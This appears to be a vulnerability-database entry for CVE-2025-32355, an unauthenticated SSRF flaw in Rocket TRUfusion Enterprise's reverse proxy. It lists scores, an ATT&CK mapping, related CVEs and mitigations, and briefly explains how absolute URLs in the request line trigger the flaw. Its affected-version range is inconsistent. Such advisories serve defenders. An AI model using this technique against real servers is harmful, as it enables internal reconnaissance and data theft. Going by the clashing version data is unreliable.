Cyber Resilience

CVE-2025-32355

HighPublic PoC

Published: 17 February 2026

Published
17 February 2026
Modified
03 April 2026
KEV Added
Patch
CVSS Score v4 7.9 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0199 84.0th percentile
Risk Priority 17 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-32355 is a high-severity SSRF (CWE-918) vulnerability in Rocketsoftware Trufusion Enterprise. Its CVSS base score is 7.9 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 16.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SC-7 (Boundary Protection) and SI-10 (Information Input Validation).

Deeper analysis

Rocket TRUfusion Enterprise through version 7.10.4.0 contains a server-side request forgery vulnerability (CWE-918) stemming from a misconfigured reverse proxy. The proxy accepts absolute URLs supplied in the HTTP request line and forwards requests to the indicated resource instead of restricting traffic to the intended backend.

An unauthenticated remote attacker can supply arbitrary URLs in the request line to cause the affected server to retrieve resources on their behalf. The CVSS 7.9 vector indicates no direct impact on the application's own confidentiality or availability but high impact on confidentiality, integrity, and availability of systems reachable from the proxy, enabling internal network reconnaissance, data exfiltration, or abuse of internal services.

The EPSS score rose from a low baseline to a peak of 0.0522 on 2026-03-24 before receding to the current value of 0.0199, indicating a temporary increase in exploitation interest after disclosure. Public advisories are available from RCESecurity and Rocket Software at the referenced URLs.

EU & UK References

Vulnerability details

Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

SSRF in public-facing reverse proxy directly enables remote exploitation of the application (T1190).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-27224Same product: Rocketsoftware Trufusion Enterprise
CVE-2025-59793Same product: Rocketsoftware Trufusion Enterprise
CVE-2025-27222Same product: Rocketsoftware Trufusion Enterprise
CVE-2026-6514Shared CWE-918
CVE-2026-44116Shared CWE-918
CVE-2026-21887Shared CWE-918
CVE-2026-31910Shared CWE-918
CVE-2026-48153Shared CWE-918
CVE-2026-45298Shared CWE-918
CVE-2026-39362Shared CWE-918

Affected Assets

rocketsoftware
trufusion enterprise
≤ 7.10.5.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Remediates the SSRF vulnerability in the Rocket TRUfusion Enterprise reverse proxy by identifying, reporting, and applying patches to versions beyond 7.10.4.0.

prevent

Validates HTTP request line inputs to the reverse proxy, rejecting absolute URLs that cause it to load arbitrary attacker-specified resources.

prevent

Enforces boundary protection at the reverse proxy to monitor and control outbound connections, preventing unauthorized fetches triggered by SSRF.

References